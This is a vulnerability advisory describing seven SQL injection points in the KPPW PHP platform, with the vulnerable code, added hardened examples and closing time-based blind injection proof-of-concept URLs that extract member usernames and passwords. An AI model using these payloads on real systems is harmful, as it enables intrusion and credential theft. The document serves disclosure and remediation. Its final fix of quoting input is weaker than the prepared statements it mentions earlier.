KPPW latest SQL injection vulnerability 7 (multiple injection points)
First SQL injection:
File: /control/user/transaction_works.php
if ($action == 'delete_image') {
    $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)", TABLEPRE, $fileid);
    $arrFileInfo = db_factory::get_one($strSql);
    $resText = CommonClass::delFileByFileId($fileid);
    if ($resText) {
        $array = explode(',', $arrServiceInfo['pic']);
        $newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
        $_POST['file_id'] = implode(",", $newArr);
        updateFilepath($arrServiceInfo['service_id'], $_POST['file_id'], 'pic');
        kekezu::echojson('deleted successfully', 1, array('fileid' => $fileid, 'save_name' => $arrFileInfo['save_name']));
        die;
    }
}
Note:
$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
$fileid is placed into the SQL statement without quotation marks or any other protection, which results in injection.
Second and third SQL injections:
Continuing from the code above:
$resText = CommonClass::delFileByFileId($fileid);
$fileid is then passed into the delFileByFileId function. Following that function:
File: /lib/inc/CommonClass.php
public static function delFileByFileId($fileId) {
    $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)", TABLEPRE, $fileId);
    $arrFileInfo = db_factory::get_one($strSql);
    $filename = S_ROOT . $arrFileInfo['save_name'];
    if (file_exists($filename)) {
        unlink($filename);
    }
    return db_factory::execute("delete from " . TABLEPRE . "witkey_file where file_id = " . $fileId);
}
There are two injections here: the $fileId variable is used without any processing in both the select and the delete statements, resulting in SQL injection.
Fourth, fifth and sixth SQL injections:
The same issue occurs in the file /control/user/transaction_works.php:
if ($action == 'delete_goodsfile') {
    $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)", TABLEPRE, $fileid);
    $arrFileInfo = db_factory::get_one($strSql);
    $resText = CommonClass::delFileByFileId($fileid);
    if ($resText) {
        $array = explode(',', $arrServiceInfo['file_path']);
        $newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
        $_POST['file_path_2'] = implode(",", $newArr);
        updateFilepath($arrServiceInfo['service_id'], $_POST['file_path_2'], 'file');
        kekezu::echojson('deleted successfully', 1, array('fileid' => $fileid, 'save_name' => $arrFileInfo['save_name']));
        die;
    }
}
The problem here is the same as the one analysed above, so injection exists in this branch as well.
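The following is an added example, not code from KPPW, that places the `file_id in (...)` pattern used in the delete_image and delete_goodsfile branches and in delFileByFileId beside a hardened version. The hardened version accepts only a comma-separated list of positive integers and refuses the whole request otherwise. The TABLEPRE value and the function names sanitizeIdList, buildQueriesVulnerable and buildQueriesHardened are assumptions for the illustration; db_factory is deliberately not called so the script runs offline and only shows the SQL text that would be executed.

```php
<?php
// Added example (not KPPW's own code): the `file_id in (...)` pattern from
// transaction_works.php and CommonClass::delFileByFileId, vulnerable form
// beside a hardened form. TABLEPRE value and all function names are assumed.

declare(strict_types=1);

const TABLEPRE = 'keke_';   // assumed prefix (the page's PoC queries keke_witkey_member)

/**
 * Reduce an untrusted "1,2,3"-style id list to a safe SQL literal.
 * Returns null if any element is not a positive integer, so the caller
 * refuses the whole request rather than silently running a partial query.
 */
function sanitizeIdList(string $raw): ?string
{
    $ids = [];
    foreach (explode(',', $raw) as $part) {
        $part = trim($part);
        // ctype_digit rejects signs, quotes, parentheses, spaces and keywords
        if ($part === '' || !ctype_digit($part) || (int)$part <= 0) {
            return null;
        }
        $ids[(int)$part] = true;   // de-duplicates repeated ids
    }
    return implode(',', array_keys($ids));
}

/** Vulnerable form, as on the page: $fileid is interpolated unchanged. */
function buildQueriesVulnerable(string $fileid): array
{
    return [
        sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)", TABLEPRE, $fileid),
        "delete from " . TABLEPRE . "witkey_file where file_id = " . $fileid,
    ];
}

/** Hardened form: the list is validated once and used for both statements. */
function buildQueriesHardened(string $fileid): ?array
{
    $list = sanitizeIdList($fileid);
    if ($list === null) {
        return null;   // caller answers with an error and runs no SQL
    }
    return [
        sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)", TABLEPRE, $list),
        "delete from " . TABLEPRE . "witkey_file where file_id in(" . $list . ")",
    ];
}

// Constructed inputs: a legitimate list and a list carrying injected SQL
// shaped like the page's PoC (a valid id followed by extra clauses).
$inputs = [
    'legitimate' => '12, 34,34',
    'hostile'    => '5566) and 1=1#',
];

foreach ($inputs as $label => $raw) {
    echo "== $label: $raw", PHP_EOL;
    foreach (buildQueriesVulnerable($raw) as $sql) {
        echo "  vulnerable: $sql", PHP_EOL;
    }
    $hardened = buildQueriesHardened($raw);
    if ($hardened === null) {
        echo "  hardened:   request rejected, no SQL executed", PHP_EOL;
    } else {
        foreach ($hardened as $sql) {
            echo "  hardened:   $sql", PHP_EOL;
        }
    }
}
```

Running the script with `php` prints the two statements each form would build: for the legitimate list the hardened form yields `in(12,34)`, while for the hostile input it rejects the request before any SQL exists. The hardened delete uses `in(...)` for the same validated list, since the original `where file_id = ` form only ever matched a single id; whitelisting by integer cast is appropriate here because file ids are numeric, whereas free-text fields need prepared statements rather than quoting.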
Seventh SQL injection:
File: /control/user/transaction_works.php
if (isset($formhash) && kekezu::submitcheck($formhash)) {
    $arrGoodsConfig = unserialize($kekezu->_model_list[6]['config']);
    $goodsprice = floatval($goodsprice);
    $floatMinCash = floatval($arrGoodsConfig['min_cash']);
    if ($floatMinCash && ($goodsprice < $floatMinCash)) {
        $tips['errors']['goodsprice'] = 'minimum value cannot be less ' . $floatMinCash . 'meta';
        kekezu::show_msg($tips, null, NULL, NULL, 'error');
    }
    if (strtoupper(CHARSET) == 'GBK') {
        $goodsname = kekezu::utftogbk($goodsname);
        $goodsdesc = kekezu::utftogbk($goodsdesc);
        $unite_price = kekezu::utftogbk($unite_price);
    }
    $arrData = array(
        'model_id' => $arrServiceInfo['model_id'] ? $arrServiceInfo['model_id'] : 6,
        'uid' => $gUid,
        'username' => $gUserInfo['username'],
        'indus_id' => $indus_id,
        'indus_pid' => $indus_pid,
        'title' => $goodsname,
        'price' => $goodsprice,
        'pic' => $file_ids,
        'content' => $goodsdesc,
        'unite_price' => $unite_price,
        'submit_method' => $submit_method,
        'file_path' => $file_path_2,
        'confirm_max' => intval($arrGoodsConfig['confirm_max_day'])
    );
    if (!$pk['service_id']) {
        $arrData['profit_rate'] = $arrGoodsConfig['service_profit'];
        $arrData['on_time'] = time();
        $arrData['service_status'] = 2;
    }
    $objServiceT = new keke_table_class('witkey_service');
    $objServiceT->save($arrData, $pk);
    unset($objServiceT);
    if ($objId && $intTaskId) {
        $strBidSql = "update `" . TABLEPRE . "witkey_task_bid` SET `hasdel` = 1 WHERE (`bid_id` = " . $objId . ") and task_id = " . $intTaskId;
        $strWorkSql = "update `" . TABLEPRE . "witkey_task_work` SET `hasdel` = 1 WHERE (`work_id` = " . $objId . ") and task_id = " . $intTaskId;
        db_factory::execute($strBidSql);
        db_factory::execute($strWorkSql);
    }
    kekezu::show_msg('Operation succeeded', $strJumpUrl, NULL, NULL, 'OK');
}
Note:
$objServiceT->save ( $arrData,$pk);
The variable $pk is passed into the save function. Following the save function:
File: /lib/inc/keke_table_class.php
function save($fields, $pk = array()) {
    foreach ($fields as $k => $v) {
        $kk = ucfirst($k);
        $set_query = "set" . $kk;
        $this->_table_obj->$set_query($v);
    }
    $keys = array_keys($pk);
    $key = $keys[0];
    //echo $key."\n";
    //print_r($pk);
    //echo $pk[$key];
    if (!empty($pk[$key])) {
        $this->_table_obj->setWhere(" $key = '" . $pk[$key] . "'");
        $edit_query = "edit_" . $this->_pre . $this->_table_name;
        $res = $this->_table_obj->$edit_query();
    } else {
        $create_query = "create_" . $this->_pre . $this->_table_name;
        $res = $this->_table_obj->$create_query();
    }
    if ($res) {
        return $res;
    } else {
        return false;
    }
}
The array key of $pk (which comes straight from the request) is concatenated into the setWhere condition as the column name, without quoting or validation, resulting in SQL injection.
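As an added example, not KPPW's own code, the following shows a hardened replacement for the $pk handling in save(): the column name taken from the array key is checked against a whitelist of known key columns, and the value is returned as a bound parameter instead of being quoted into the SQL text. The function name buildPkWhere and the constant WITKEY_SERVICE_PK_COLUMNS are assumptions for the illustration; the project's _table_obj->setWhere() is not reproduced.

```php
<?php
// Added example (not KPPW's own code): hardening the $pk handling in
// keke_table_class::save(). In the original, the array key of $pk is
// interpolated into setWhere(" $key = '...' ") unchanged, so a request
// parameter such as pk[<text>]=value controls the column-name position.
// The fix is to accept only known column names for the key and to bind
// the value instead of quoting it by hand.

declare(strict_types=1);

/** Hypothetical table definition: which columns may be used as the key. */
const WITKEY_SERVICE_PK_COLUMNS = ['service_id'];

/**
 * Build a parameterised WHERE fragment for a primary-key lookup.
 *
 * @param array<string,mixed> $pk          user-supplied ['column' => value]
 * @param string[]            $allowedKeys columns this table may be keyed by
 * @return array{0:string,1:array<int,mixed>}|null  [sql, bound params], or null if rejected
 */
function buildPkWhere(array $pk, array $allowedKeys): ?array
{
    if (count($pk) !== 1) {
        return null;                       // exactly one key column expected
    }
    $key = (string)array_key_first($pk);
    // Whitelist: the column name must match a known identifier exactly,
    // so anything containing spaces, operators or comment markers is refused.
    if (!in_array($key, $allowedKeys, true)) {
        return null;
    }
    $value = $pk[$key];
    if ($value === null || $value === '') {
        return null;                       // original code treats empty as "create"
    }
    // Column is whitelisted (and backtick-quoted defensively); value is bound.
    return ['`' . $key . '` = ?', [$value]];
}

// Legitimate request: pk[service_id]=5
var_dump(buildPkWhere(['service_id' => '5'], WITKEY_SERVICE_PK_COLUMNS));

// Constructed hostile request shaped like the page's PoC: the extra SQL sits
// in the array key, which the original save() used as the column name.
var_dump(buildPkWhere(['service_id=1 and 1=1#' => '222222'], WITKEY_SERVICE_PK_COLUMNS));

// A hostile value cannot break out of the query either, because it is passed
// as a parameter rather than spliced into the SQL string.
var_dump(buildPkWhere(['service_id' => "1' or '1'='1"], WITKEY_SERVICE_PK_COLUMNS));
```

The returned fragment and parameter list are meant to be handed to a prepared statement (for example PDO's prepare() and execute()), so the value never becomes part of the SQL text. Identifiers such as column names cannot be bound as parameters, which is why the key must be validated against a fixed list rather than escaped.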
First SQL injection (proof of concept):
http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566) and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23
The response is delayed by 5 seconds, indicating that the first character of the username is 'a'; continuing in this way extracts the rest of the user information.
Second and third SQL injections (proof of concept):
http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)
The response is delayed by 5 seconds, indicating that the first character of the username is 'a'; continuing in this way extracts the rest of the user information.
Seventh SQL injection (proof of concept):
http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editworkformhash=6cb7d4&objId=0&pk%5Bservice_id=1+and+1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23%5D=222222&goodsname=111&goodsdesc=111&indus_pid=249&indus_id=-1&upload=&file_ids=&goodsprice=111&unite_price=%E4%B8%AA&submit_method=outside&file_upload_i=&file_path_2=
The response is delayed by 5 seconds, indicating that the first character of the username is 'a'; continuing in this way extracts the rest of the user information.
Solution:
Protect user-supplied data with single quotes (and proper escaping) before it reaches SQL statements.